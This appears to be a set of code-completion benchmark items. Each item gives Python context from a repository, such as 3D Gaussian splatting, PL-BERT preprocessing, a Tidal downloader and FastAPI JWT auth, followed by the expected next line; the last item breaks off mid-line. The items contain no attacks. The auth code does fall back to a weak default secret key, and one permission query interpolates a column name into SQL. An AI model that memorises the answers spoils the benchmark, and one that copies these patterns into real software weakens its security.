You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: gmum/ViewingDirectionGaussianSplatting # Path: utils/graphics_utils.py def getWorld2View2(R, t, translate=np.array([.0, .0, .0]), scale=1.0): Rt = np.zeros((4, 4)) Rt[:3, :3] = R.transpose() Rt[:3, 3] = t Rt[3, 3] = 1.0 C2W = np.linalg.inv(Rt) cam_center = C2W[:3, 3] cam_center = (cam_center + translate) * scale C2W[:3, 3] = cam_center Rt = np.linalg.inv(C2W) return np.float32(Rt) # Path: utils/graphics_utils.py def getProjectionMatrix(znear, zfar, fovX, fovY): tanHalfFovY = math.tan((fovY / 2)) tanHalfFovX = math.tan((fovX / 2)) top = tanHalfFovY * znear bottom = -top right = tanHalfFovX * znear left = -right P = torch.zeros(4, 4) z_sign = 1.0 P[0, 0] = 2.0 * znear / (right - left) P[1, 1] = 2.0 * znear / (top - bottom) P[0, 2] = (right + left) / (right - left) P[1, 2] = (top + bottom) / (top - bottom) P[3, 2] = z_sign P[2, 2] = z_sign * zfar / (zfar - znear) P[2, 3] = -(zfar * znear) / (zfar - znear) return P # Path: scene/cameras.py import torch import numpy as np from torch import nn from utils.graphics_utils import getWorld2View2, getProjectionMatrix # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # class Camera(nn.Module): def __init__(self, colmap_id, R, T, FoVx, FoVy, image, gt_alpha_mask, image_name, uid, trans=np.array([0.0, 0.0, 0.0]), scale=1.0, data_device = "cuda" ): super(Camera, self).__init__() self.uid = uid self.colmap_id = colmap_id self.R = R self.T = T self.FoVx = FoVx self.FoVy = FoVy self.image_name = image_name try: self.data_device = torch.device(data_device) except Exception as e: print(e) print(f"[Warning] Custom device {data_device} failed, fallback to default cuda device" ) self.data_device = torch.device("cuda") self.original_image = image.clamp(0.0, 1.0).to(self.data_device) self.image_width = self.original_image.shape[2] self.image_height = self.original_image.shape[1] if gt_alpha_mask is not None: self.original_image *= gt_alpha_mask.to(self.data_device) else: self.original_image *= torch.ones((1, self.image_height, self.image_width), device=self.data_device) self.zfar = 100.0 self.znear = 0.01 self.trans = trans self.scale = scale self.world_view_transform = torch.tensor(getWorld2View2(R, T, trans, scale)).transpose(0, 1).cuda()
self.projection_matrix = getProjectionMatrix(znear=self.znear, zfar=self.zfar, fovX=self.FoVx, fovY=self.FoVy).transpose(0,1).cuda()
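In the reference gaussian-splatting `Camera`, this constructor typically finishes by composing the two transforms and recovering the camera center from the inverse view matrix; a sketch of the usual continuation (assumed from the original 3DGS code, not verified against this fork):

self.full_proj_transform = (self.world_view_transform.unsqueeze(0)
                            .bmm(self.projection_matrix.unsqueeze(0))).squeeze(0)
self.camera_center = self.world_view_transform.inverse()[3, :3]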
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: tonnetonne814/PL-Bert-VITS2 # Path: PL_BERT_ja/text_utils.py class TextCleaner: def __init__(self, dummy=None): self.word_index_dictionary = symbol_to_id def __call__(self, text): indexes = [] japanese = False for char in text: try: indexes.append(self.word_index_dictionary[char]) except: if char == "。" or char == "、": indexes.append(0) # padとして扱う return indexes # Path: PL_BERT_ja/phonemize.py def phonemize(text, tokenizer): text = unicodedata.normalize("NFKC", text) words = tokenizer.tokenize(text) input_ids_ = tokenizer.convert_tokens_to_ids(words) phonemes = [] input_ids = [] for i in range(len(words)): word = words[i] input_id = input_ids_[i] phoneme = global_phonemize(word.replace('#', '')) if len(phoneme) != 0: phonemes.append(''.join(phoneme)) input_ids.append(input_id) assert len(input_ids) == len(phonemes) return {'input_ids' : input_ids, 'phonemes': phonemes} # Path: PL_BERT_ja/model.py class MultiTaskModel(nn.Module): def __init__(self, model, num_tokens, num_vocab, hidden_size): super().__init__() self.encoder = model self.mask_predictor = nn.Linear(hidden_size, num_tokens) self.word_predictor = nn.Linear(hidden_size, num_vocab) def forward(self, phonemes, attention_mask=None): output = self.encoder(phonemes, attention_mask=attention_mask, output_hidden_states=True) tokens_pred = self.mask_predictor(output.last_hidden_state) words_pred = self.word_predictor(output.last_hidden_state) return tokens_pred, words_pred, output # Path: preprocess_ja.py import argparse import os import polars import random import torch import yaml, torch from PL_BERT_ja.text_utils import TextCleaner from PL_BERT_ja.phonemize import phonemize from tqdm import tqdm from PL_BERT_ja.model import MultiTaskModel from transformers import AlbertConfig, AlbertModel from transformers import BertJapaneseTokenizer def preprocess(dataset_dir, pl_bert_dir): n_val_test_file = 10 filelist_dir = "./filelists/" dataset_name = "jvnv_ver1" os.makedirs(filelist_dir, exist_ok=True) split_symbol = "||||" transcript_csv_df = polars.read_csv(os.path.join(dataset_dir, "jvnv_v1", "transcription.csv"),has_header=False)[:, 0] emo_list = os.listdir(os.path.join(dataset_dir,"jvnv_v1", "F1")) style_list = os.listdir(os.path.join(dataset_dir,"jvnv_v1", "F1", "anger")) pl_bert_savedir = "./pl_bert_embeddings" os.makedirs(pl_bert_savedir, exist_ok=True) pl_bert_model, pl_bert_config, device = get_pl_bert_ja(dir=pl_bert_dir) pl_bert_cleaner = TextCleaner() pl_bert_tokenizer = BertJapaneseTokenizer.from_pretrained(pl_bert_config['dataset_params']['tokenizer']) hidden_size = pl_bert_config["model_params"]["hidden_size"] n_layers = pl_bert_config["model_params"]["num_hidden_layers"] + 1 filelists = list() spk_g = ["F", "M"] for line in tqdm(transcript_csv_df): index_name, emo_prefix, text = line.split("|") emotion, style, file_idx = index_name.split("_") text = text.replace("\n", "") phonemes = ''.join(phonemize(text,pl_bert_tokenizer)["phonemes"]) input_ids = pl_bert_cleaner(phonemes) with torch.inference_mode(): hidden_stats = pl_bert_model(torch.tensor(input_ids, dtype=torch.int64, device=device).unsqueeze(0))[-1]["hidden_states"] save_tensor = torch.zeros(size=(n_layers, len(input_ids), hidden_size), 
device=device) for idx, hidden_stat in enumerate(hidden_stats): save_tensor[idx, :, :] = hidden_stat torch.save(save_tensor.to('cpu').detach(), os.path.join(pl_bert_savedir, f"{index_name}.PlBertJa")) for g_idx in range(2): for spk_idx in range(2): spk_ID = str(g_idx + spk_idx*2) spk = spk_g[g_idx] + str(spk_idx+1) wav_path = os.path.join(dataset_dir, "jvnv_v1", spk, emotion, style, f"{spk}_{emotion}_{style}_{file_idx}.wav") filelists.append(f"{wav_path}{split_symbol}{spk_ID}{split_symbol}{phonemes}{split_symbol}{text}{split_symbol}{index_name}{split_symbol}emo:{str(emo_list.index(emotion))}{split_symbol}style:{str(style_list.index(style))}\n") val_list = list() test_list = list() for idx in range(n_val_test_file*2): target_idx = random.randint(0, len(filelists)) target_line = filelists.pop(target_idx) if idx % 2 == 1: val_list.append(target_line) else: test_list.append(target_line) write_txt(filelists, os.path.join(filelist_dir, f"{dataset_name}_train.txt")) write_txt(val_list, os.path.join(filelist_dir, f"{dataset_name}_val.txt")) write_txt(test_list, os.path.join(filelist_dir, f"{dataset_name}_test.txt")) return 0 def write_txt(lists, path): with open(path, mode="w", encoding="utf-8") as f: f.writelines(lists) def get_pl_bert_ja(dir): device = torch.device("cuda" if torch.cuda.is_available() else "cpu") config_path=os.path.join(dir, "config.yml") config = yaml.safe_load(open(config_path)) albert_base_configuration = AlbertConfig(**config['model_params']) bert_ = AlbertModel(albert_base_configuration).to(device) #num_vocab = max([m['token'] for m in token_maps.values()]) + 1 # 30923 + 1
bert = MultiTaskModel(
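Given the `MultiTaskModel(model, num_tokens, num_vocab, hidden_size)` signature shown in the prompt, the call opened by the reference line plausibly completes as below; the concrete values are assumptions read off the config keys and the commented-out `num_vocab` line, not verified code:

bert = MultiTaskModel(
    bert_,
    num_tokens=config['model_params']['vocab_size'],  # assumed config key
    num_vocab=30924,  # 30923 + 1, per the commented-out line above
    hidden_size=config['model_params']['hidden_size'],
)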
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Ruiyuan-Zhang/CCS # Path: multi_part_assembly/models/modules/encoder/point_transformer/pointnet_util.py def index_points(points, idx): """ Input: points: input points data, [B, N, C] idx: sample index data, [B, S, [K]] Return: new_points:, indexed points data, [B, S, [K], C] """ raw_size = idx.size() idx = idx.reshape(raw_size[0], -1) res = torch.gather(points, 1, idx[..., None].expand(-1, -1, points.size(-1))) return res.reshape(*raw_size, -1) # Path: multi_part_assembly/models/modules/encoder/point_transformer/pointnet_util.py def square_distance(src, dst): """ Calculate Euclid distance between each two points. src^T * dst = xn * xm + yn * ym + zn * zm; sum(src^2, dim=-1) = xn*xn + yn*yn + zn*zn; sum(dst^2, dim=-1) = xm*xm + ym*ym + zm*zm; dist = (xn - xm)^2 + (yn - ym)^2 + (zn - zm)^2 = sum(src**2,dim=-1)+sum(dst**2,dim=-1)-2*src^T*dst Input: src: source points, [B, N, C] dst: target points, [B, M, C] Output: dist: per-point square distance, [B, N, M] """ return torch.sum((src[:, :, None] - dst[:, None]) ** 2, dim=-1) # Path: multi_part_assembly/models/modules/encoder/point_transformer/transformer.py from multi_part_assembly.models.modules.encoder.point_transformer.pointnet_util import index_points, square_distance import torch import torch.nn as nn import torch.nn.functional as F import numpy as np class TransformerBlock(nn.Module): def __init__(self, d_points, d_model, k) -> None: super().__init__() self.fc1 = nn.Linear(d_points, d_model) self.fc2 = nn.Linear(d_model, d_points) self.fc_delta = nn.Sequential( nn.Linear(3, d_model), nn.ReLU(), nn.Linear(d_model, d_model) ) self.fc_gamma = nn.Sequential( nn.Linear(d_model, d_model), nn.ReLU(), nn.Linear(d_model, d_model) ) self.w_qs = nn.Linear(d_model, d_model, bias=False) self.w_ks = nn.Linear(d_model, d_model, bias=False) self.w_vs = nn.Linear(d_model, d_model, bias=False) self.k = k # xyz: b x n x 3, features: b x n x f def forward(self, xyz, features):
dists = square_distance(xyz, xyz)
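After the pairwise distances are computed, a point transformer gathers the k nearest neighbours per point and attends over them. A self-contained toy version of that gather step, using `torch.cdist` in place of the repo's `square_distance` and a plain `torch.gather` in place of `index_points`:

import torch

B, N, k, C = 2, 32, 8, 16
xyz = torch.rand(B, N, 3)
feats = torch.rand(B, N, C)

dists = torch.cdist(xyz, xyz) ** 2           # (B, N, N) squared distances
knn_idx = dists.argsort(dim=-1)[:, :, :k]    # (B, N, k) nearest-neighbour ids
knn_feats = torch.gather(
    feats.unsqueeze(1).expand(B, N, N, C), 2,
    knn_idx.unsqueeze(-1).expand(B, N, k, C))  # (B, N, k, C) gathered features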
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: uc-vision/taichi-splatting # Path: taichi_splatting/data_types.py class RasterConfig: tile_size: int = 16 # pixel tilin per thread in the backwards pass pixel_stride: Tuple[int, int] = (2, 2) margin_tiles: int = 3 # cutoff N standard deviations from mean gaussian_scale: float = 3.0 # cull to an oriented box, otherwise an axis aligned bounding box tight_culling: bool = True clamp_max_alpha: float = 0.99 alpha_threshold: float = 1. / 255. saturate_threshold: float = 0.9999 # Path: taichi_splatting/renderer2d.py def project_gaussians2d(points: Gaussians2D) -> torch.Tensor: def render_gaussians( gaussians: Gaussians2D, image_size: Tuple[Integral, Integral], raster_config: RasterConfig ): # Path: taichi_splatting/tests/random_data.py def random_2d_gaussians(n, image_size, scale_factor=1.0, alpha_range=(0.1, 0.9), depth_range=(0.1, 100.0)): w, h = image_size position = torch.rand(n, 2) * torch.tensor([w, h], dtype=torch.float32).unsqueeze(0) depth = torch.rand((n, 1)) * (depth_range[1] - depth_range[0]) + depth_range[0] density_scale = scale_factor * w / (1 + math.sqrt(n)) scaling = (torch.rand(n, 2) + 0.2) * density_scale rotation = torch.randn(n, 2) rotation = rotation / torch.norm(rotation, dim=1, keepdim=True) low, high = alpha_range alpha = torch.rand(n) * (high - low) + low return Gaussians2D( position=position, depth=depth, log_scaling=torch.log(scaling), rotation=rotation, alpha_logit=torch_proj.inverse_sigmoid(alpha), feature=torch.rand(n, 3), batch_size=(n,) ) # Path: taichi_splatting/torch_ops/util.py def check_finite(tensor_dict): for k, v in tensor_dict.items(): n = (~torch.isfinite(v)).sum() if n > 0: raise ValueError(f'Found {n} non-finite values in {k}') if v.grad is not None: n = (~torch.isfinite(v.grad)).sum() if n > 0: raise ValueError(f'Found {n} non-finite gradients in {k}') # Path: taichi_splatting/scripts/fit_image_gaussians.py import cv2 import argparse import taichi as ti import torch import time from torch.optim import Adam from taichi_splatting.data_types import RasterConfig from taichi_splatting.renderer2d import render_gaussians, Gaussians2D from taichi_splatting.tests.random_data import random_2d_gaussians from taichi_splatting.torch_ops.util import check_finite def parse_args(): parser = argparse.ArgumentParser() parser.add_argument('image_file', type=str) parser.add_argument('--seed', type=int, default=0) parser.add_argument('--tile_size', type=int, default=16) parser.add_argument('--n', type=int, default=20000) parser.add_argument('--debug', action='store_true') parser.add_argument('--show', action='store_true') parser.add_argument('--profile', action='store_true') parser.add_argument('--epoch', type=int, default=100, help='Number of iterations per measurement/profiling') return parser.parse_args() def optimizer(gaussians: Gaussians2D, base_lr=1.0): learning_rates = dict( position=0.1, log_scaling=0.025, rotation=0.005, alpha_logit=0.2, feature=0.01 ) params = {k: torch.nn.Parameter(x, requires_grad=True) if k in learning_rates else x for k, x in gaussians.items()} param_groups = [ dict(params=[params[name]], lr=lr * base_lr, name=name) for name, lr in learning_rates.items() ] return Adam(param_groups), Gaussians2D(**params, 
batch_size=gaussians.batch_size) def display_image(image): image = (image.detach().clamp(0, 1) * 255).to(torch.uint8) image = image.cpu().numpy() cv2.imshow('rendered', image) cv2.waitKey(1) def main(): device = torch.device('cuda:0') args = parse_args() ref_image = cv2.imread(args.image_file) h, w = ref_image.shape[:2] ti.init(arch=ti.cuda, log_level=ti.INFO, debug=args.debug, device_memory_GB=0.1) print(f'Image size: {w}x{h}') if args.show: cv2.namedWindow('rendered', cv2.WINDOW_FULLSCREEN) torch.manual_seed(args.seed) gaussians = random_2d_gaussians(args.n, (w, h)).to(torch.device('cuda:0')) opt, params = optimizer(gaussians, base_lr=1.0) ref_image = torch.from_numpy(ref_image).to(dtype=torch.float32, device=device) / 255 config = RasterConfig(tile_size=args.tile_size) while True: if args.profile: ti.profiler.clear_kernel_profiler_info() start = time.time() for _ in range(args.epoch): opt.zero_grad()
image = render_gaussians(params, (w, h), config)
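Each step of the fitting loop then plausibly compares the rendering to the reference image and backpropagates; a sketch of the remainder of the loop body (assumed, not the script's verified code):

loss = torch.nn.functional.l1_loss(image, ref_image)
loss.backward()
check_finite(params)  # raises if any parameter or gradient is non-finite
opt.step()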
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: exislow/tidal-dl-ng # Path: tidal_dl_ng/helper/decorator.py class SingletonMeta(type): """ The Singleton class can be implemented in different ways in Python. Some possible methods include: base class, decorator, metaclass. We will use the metaclass because it is best suited for this purpose. """ _instances: ClassVar[dict] = {} def __call__(cls, *args, **kwargs): """ Possible changes to the value of the `__init__` argument do not affect the returned instance. """ if cls not in cls._instances: instance = super().__call__(*args, **kwargs) cls._instances[cls] = instance return cls._instances[cls] # Path: tidal_dl_ng/helper/path.py def path_base() -> str: path_config: str = ".config" path_base: str = os.path.join(path_home(), path_config, __name_display__) return path_base # Path: tidal_dl_ng/helper/path.py def path_file_settings() -> str: # TODO: Remove this soon. Only for migration to new dir. old = os.path.join(path_home(), ".tidal-dl-ng_settings.json") if os.path.isfile(old): os.makedirs(path_base(), exist_ok=True) os.rename(old, os.path.join(path_base(), "settings.json")) return os.path.join(path_base(), "settings.json") # Path: tidal_dl_ng/helper/path.py def path_file_token() -> str: # TODO: Remove this soon. Only for migration to new dir. old = os.path.join(path_home(), ".tidal-dl-ng_token.json") if os.path.isfile(old): os.makedirs(path_base(), exist_ok=True) os.rename(old, os.path.join(path_base(), "token.json")) return os.path.join(path_base(), "token.json") # Path: tidal_dl_ng/model/cfg.py class Settings: skip_existing: SkipExisting = SkipExisting.Disabled # TODO: Implement cover download to a separate file. # album_cover_save: bool = True lyrics_save: bool = False # TODO: Implement API KEY selection. # api_key_index: bool = 0 # TODO: Implement album info download to separate file. # album_info_save: bool = False video_download: bool = True # TODO: Implement multi threading for downloads. # multi_thread: bool = False download_delay: bool = True download_base_path: str = "./download" quality_audio: Quality = Quality.low_320k quality_video: QualityVideo = QualityVideo.P480 format_album: str = "Albums/{artist_name} - {album_title}/{track_num}. 
{artist_name} - {track_title}" format_playlist: str = "Playlists/{playlist_name}/{artist_name} - {track_title}" format_mix: str = "Mix/{mix_name}/{artist_name} - {track_title}" format_track: str = "Tracks/{artist_name} - {track_title}" format_video: str = "Videos/{artist_name} - {track_title}" video_convert_mp4: bool = True metadata_cover_dimension: CoverDimensions = CoverDimensions.Px320 # Path: tidal_dl_ng/model/cfg.py class Token: token_type: str | None = None access_token: str | None = None refresh_token: str | None = None expiry_time: float = 0.0 # Path: tidal_dl_ng/config.py import os import shutil import tidalapi from collections.abc import Callable from json import JSONDecodeError from typing import Any from requests import HTTPError from tidal_dl_ng.helper.decorator import SingletonMeta from tidal_dl_ng.helper.path import path_base, path_file_settings, path_file_token from tidal_dl_ng.model.cfg import Settings as ModelSettings from tidal_dl_ng.model.cfg import Token as ModelToken class BaseConfig: data: ModelSettings | ModelToken = None file_path: str = None cls_model: object = None path_base: str = path_base() def save(self) -> None: data_json = self.data.to_json() # Try to create the base folder. os.makedirs(self.path_base, exist_ok=True) with open(self.file_path, encoding="utf-8", mode="w") as f: f.write(data_json) def set_option(self, key: str, value: Any) -> None: setattr(self.data, key, value) def read(self, path: str) -> bool: result = False try: with open(path, encoding="utf-8") as f: settings_json = f.read() self.data = self.cls_model.from_json(settings_json) result = True except (JSONDecodeError, TypeError, FileNotFoundError, ValueError) as e: if isinstance(e, ValueError): path_bak = path + ".bak" # First check if a backup file already exists. If yes, remove it. if os.path.exists(path_bak): os.remove(path_bak) # Move the invalid config file to the backup location. shutil.move(path, path_bak) # TODO: Implement better global logger. print( "Something is wrong with your config. Maybe it is not compatible anymore due to a new app version." f" You can find a backup of your old config here: '{path_bak}'. A new default config was created." ) self.data = self.cls_model() # Call save in case of we need to update the saved config, due to changes in code. # TODO: Compare if config in memory and on disk is different. Otherwise no write operation. self.save() return result class Settings(BaseConfig, metaclass=SingletonMeta): cls_model = ModelSettings data = None def __init__(self): self.file_path = path_file_settings() self.read(self.file_path) class Tidal(BaseConfig, metaclass=SingletonMeta): cls_model = ModelToken session: tidalapi.Session = None data: ModelToken = None token_from_storage: bool = False settings: Settings = None def __init__(self, settings: Settings = None): self.session = tidalapi.Session() # self.session.config.client_id = "km8T1xS355y7dd3H" # self.session.config.client_secret = "vcmeGW1OuZ0fWYMCSZ6vNvSLJlT3XEpW0ambgYt5ZuI=" self.session.video_quality = tidalapi.VideoQuality.high
self.file_path = path_file_token()
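The `Tidal` initializer then plausibly loads the stored token and keeps a reference to the settings, mirroring how `Settings.__init__` reads its own file; a two-line sketch (assumed):

self.token_from_storage = self.read(self.file_path)
self.settings = settings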
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: smoores-dev/storyteller # Path: storyteller/api/models.py class InviteAccept(BaseModel): username: str full_name: str email: str password: str invite_key: str # Path: storyteller/api/models.py class TokenData(BaseModel): username: str # Path: storyteller/api/database/users.py def get_user(username: str): cursor = connection.execute( """ SELECT username, full_name, email, hashed_password, book_create, book_read, book_process, book_download, book_list, user_create, user_list, user_read, user_delete, settings_update FROM user JOIN user_permission ON user.user_permission_id = user_permission.id WHERE username = :username """, {"username": username}, ) ( username, full_name, email, hashed_password, book_create, book_read, book_process, book_download, book_list, user_create, user_list, user_read, user_delete, settings_update, ) = cursor.fetchone() return DBUser( username=username, full_name=full_name, email=email, permissions=UserPermissions( book_create=book_create, book_read=book_read, book_process=book_process, book_download=book_download, book_list=book_list, user_create=user_create, user_list=user_list, user_read=user_read, user_delete=user_delete, settings_update=settings_update, ), hashed_password=hashed_password, ) # Path: storyteller/api/database/users.py def user_has_permission(username: str, permission: str): cursor = connection.execute( f""" SELECT {permission} FROM user_permission JOIN user ON user.user_permission_id = user_permission.id WHERE user.username = :username """, {"username": username, "permission": permission}, ) (has_permission,) = cursor.fetchone() return has_permission # Path: storyteller/api/database/invites.py def verify_invite(email: str, key: str): cursor = connection.execute( """ SELECT id FROM invite WHERE email=:email AND key=:key """, {"email": email, "key": key}, ) return cursor.fetchone() is None # Path: storyteller/api/auth.py import base64 import json import os from datetime import timedelta, datetime from typing import Annotated, Optional, cast from urllib.parse import unquote from jose import JWTError, jwt from fastapi import Body, Depends, HTTPException, Request, status from fastapi.security import OAuth2PasswordBearer from passlib.context import CryptContext from starlette.status import HTTP_401_UNAUTHORIZED from .models import InviteAccept, TokenData from .database import get_user, user_has_permission, verify_invite as verify_invite_db SECRET_KEY = os.getenv("STORYTELLER_SECRET_KEY", "<notsosecret>") ALGORITHM = "HS256" ACCESS_TOKEN_EXPIRE_DAYS = 10 class OAuth2PasswordBearerWithCookie(OAuth2PasswordBearer): async def __call__(self, request: Request) -> Optional[str]: header_param = None try: header_param = await super().__call__(request) except HTTPException: pass if header_param is not None: return header_param auth_cookie = request.cookies.get("st_token") if not auth_cookie: if self.auto_error: raise HTTPException( status_code=HTTP_401_UNAUTHORIZED, detail="Not authenticated", headers={"WWW-Authenticate": "Bearer"}, ) else: return None auth_token = json.loads(base64.urlsafe_b64decode(unquote(auth_cookie))) access_token = auth_token["access_token"] if not access_token: if self.auto_error: raise HTTPException( 
status_code=HTTP_401_UNAUTHORIZED, detail="Not authenticated", headers={"WWW-Authenticate": "Bearer"}, ) else: return None return access_token oauth2_scheme = OAuth2PasswordBearerWithCookie(tokenUrl="token") password_context = CryptContext(schemes=["argon2"], deprecated="auto") def verify_password(plain_password: str, hashed_password: str): return password_context.verify(plain_password, hashed_password) def get_password_hash(password: str): return password_context.hash(password) def authenticate_user(username: str, password: str): try: user = get_user(username) except: return None if not verify_password(password, user.hashed_password): return None return user def create_access_token(data: dict, expires_delta: timedelta | None = None): to_encode = data.copy() if expires_delta: expire = datetime.utcnow() + expires_delta else: expire = datetime.utcnow() + timedelta(days=ACCESS_TOKEN_EXPIRE_DAYS) to_encode.update({"exp": expire}) encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM) return encoded_jwt unauthorized = HTTPException( status_code=status.HTTP_401_UNAUTHORIZED, detail="Invalid authentication credentials", headers={"WWW-Authenticate": "Bearer"}, ) def verify_token(token: Annotated[str, Depends(oauth2_scheme)]): try: payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM]) username: str | None = cast(str | None, payload.get("sub")) if username is None: raise unauthorized token_data = TokenData(username=username) except JWTError: raise unauthorized return token_data def verify_invite(invite: Annotated[InviteAccept, Body()]):
if verify_invite_db(invite.email, invite.invite_key):
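Note the inverted naming here: the database helper returns True when `fetchone()` finds no matching invite row, so the dependency rejects exactly when it returns True. A sketch of how the dependency plausibly finishes (the specific status code is an assumption):

def verify_invite(invite: Annotated[InviteAccept, Body()]):
    if verify_invite_db(invite.email, invite.invite_key):
        # No matching (email, key) row was found -> reject the request.
        raise HTTPException(
            status_code=status.HTTP_403_FORBIDDEN,
            detail="Invalid invite key",
        )
    return invite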
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: noprobelm/terminal-cellular-automaton # Path: terminal_cellular_automaton/cell.py class MooreCell: """A cell that references members of a MooreNeighborhood +---+---+---+ | 1 | 2 | 3 | +---+---+---+ | 4 | C | 5 | +---+---+---+ | 6 | 7 | 8 | +---+---+---+ """ neighbors: Tuple[Coordinate, ...] = ( # Upper left Coordinate(-1, -1), # Upper Coordinate(0, -1), # Upper right Coordinate(1, -1), # Right Coordinate(1, 0), # Lower right Coordinate(1, 1), # Lower Coordinate(0, 1), # Lower left Coordinate(-1, 1), # Left Coordinate(-1, 0), ) def __init__(self, coord: Coordinate) -> None: """Initializes an instance of the MooreCell class""" self.coord = coord def get_neighbors(self, max_coord: Coordinate) -> list[Coordinate]: """Gets neighbors based on the max coord. Neighbors will usually be the eight surrounding cells in an automaton, but for cells living along the min/max coords, neighbors will wrap around to the other side of this grid. This ensures continuity and enables a life to wrap around the other side of the simulation once it reaches a boundary, emulating a pseudo-infinite space. Args: max_coord (Coordinate): The maximum coordinate found in the underlying Automaton Returns: A list of the cell's neighbors """ neighbors = [] for nc in self.neighbors: n = nc + self.coord if n.x < 0 and n.y < 0: n = Coordinate(max_coord.x, max_coord.y) elif n.x > max_coord.x and n.y > max_coord.y: n = Coordinate(0, 0) elif n.x < 0 and n.y > max_coord.y: n = Coordinate(max_coord.x, 0) elif n.y < 0 and n.x > max_coord.x: n = Coordinate(0, max_coord.y) elif n.x > max_coord.x: n = Coordinate(0, n.y) elif n.y < 0: n = Coordinate(n.x, max_coord.y) elif n.y > max_coord.y: n = Coordinate(n.x, 0) elif n.x < 0: n = Coordinate(max_coord.x, n.y) elif n.x > max_coord.x: n = Coordinate(0, n.y) neighbors.append(n) return neighbors # Path: terminal_cellular_automaton/coordinate.py class Coordinate: """An x/y coordinate to reference location in a 2 dimensional matrix""" x: int y: int def __add__(self, other: Coordinate) -> Coordinate: """Returns the sum of one coordinate and another. Primarily used to identify neighbors""" return Coordinate(self.x + other.x, self.y + other.y) def __sub__(self, other: Coordinate) -> Coordinate: """Returns the sum of one coordinate and another. Primarily used to identify neighbors""" return Coordinate(self.x - other.x, self.y - other.y) def __contains__(self, other: Coordinate) -> bool: if 0 <= other.x <= self.x and 0 <= other.y <= self.y: return True return False # Path: tests/test_cell.py from ward import test, fixture from terminal_cellular_automaton.cell import MooreCell from terminal_cellular_automaton.coordinate import Coordinate """Tests the get_neighbors method for all Cell types""" @fixture def max_coord(): return Coordinate(2, 2) @test("A centrally located MooreCell will have 8 neighbors in its immediate area") def _():
c = MooreCell(Coordinate(1, 1))
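With `max_coord = Coordinate(2, 2)`, the cell at (1, 1) sits in the middle of a 3x3 grid, so no wrap-around is needed; the test plausibly continues by counting the neighbours. A sketch (ward injects the fixture through the default argument):

@test("A centrally located MooreCell will have 8 neighbors in its immediate area")
def _(max_coord=max_coord):
    c = MooreCell(Coordinate(1, 1))
    neighbors = c.get_neighbors(max_coord)
    assert len(neighbors) == 8
    assert Coordinate(0, 0) in neighbors  # upper-left neighbour, unwrapped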
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: zyrant/SPGroup3D # Path: mmdet3d/core/bbox/structures/utils.py @array_converter(apply_to=('points', 'angles')) def rotation_3d_in_axis(points, angles, axis=0, return_mat=False, clockwise=False): """Rotate points by angles according to axis. Args: points (np.ndarray | torch.Tensor | list | tuple ): Points of shape (N, M, 3). angles (np.ndarray | torch.Tensor | list | tuple | float): Vector of angles in shape (N,) axis (int, optional): The axis to be rotated. Defaults to 0. return_mat: Whether or not return the rotation matrix (transposed). Defaults to False. clockwise: Whether the rotation is clockwise. Defaults to False. Raises: ValueError: when the axis is not in range [0, 1, 2], it will raise value error. Returns: (torch.Tensor | np.ndarray): Rotated points in shape (N, M, 3). """ batch_free = len(points.shape) == 2 if batch_free: points = points[None] if isinstance(angles, float) or len(angles.shape) == 0: angles = torch.full(points.shape[:1], angles) assert len(points.shape) == 3 and len(angles.shape) == 1 \ and points.shape[0] == angles.shape[0], f'Incorrect shape of points ' \ f'angles: {points.shape}, {angles.shape}' assert points.shape[-1] in [2, 3], \ f'Points size should be 2 or 3 instead of {points.shape[-1]}' rot_sin = torch.sin(angles) rot_cos = torch.cos(angles) ones = torch.ones_like(rot_cos) zeros = torch.zeros_like(rot_cos) if points.shape[-1] == 3: if axis == 1 or axis == -2: rot_mat_T = torch.stack([ torch.stack([rot_cos, zeros, -rot_sin]), torch.stack([zeros, ones, zeros]), torch.stack([rot_sin, zeros, rot_cos]) ]) elif axis == 2 or axis == -1: rot_mat_T = torch.stack([ torch.stack([rot_cos, rot_sin, zeros]), torch.stack([-rot_sin, rot_cos, zeros]), torch.stack([zeros, zeros, ones]) ]) elif axis == 0 or axis == -3: rot_mat_T = torch.stack([ torch.stack([ones, zeros, zeros]), torch.stack([zeros, rot_cos, rot_sin]), torch.stack([zeros, -rot_sin, rot_cos]) ]) else: raise ValueError(f'axis should in range ' f'[-3, -2, -1, 0, 1, 2], got {axis}') else: rot_mat_T = torch.stack([ torch.stack([rot_cos, rot_sin]), torch.stack([-rot_sin, rot_cos]) ]) if clockwise: rot_mat_T = rot_mat_T.transpose(0, 1) if points.shape[0] == 0: points_new = points else: points_new = torch.einsum('aij,jka->aik', points, rot_mat_T) if batch_free: points_new = points_new.squeeze(0) if return_mat: rot_mat_T = torch.einsum('jka->ajk', rot_mat_T) if batch_free: rot_mat_T = rot_mat_T.squeeze(0) return points_new, rot_mat_T else: return points_new # Path: mmdet3d/models/builder.py HEADS = MODELS # Path: mmdet3d/models/builder.py def build_loss(cfg): """Build loss function.""" if cfg['type'] in LOSSES._module_dict.keys(): return 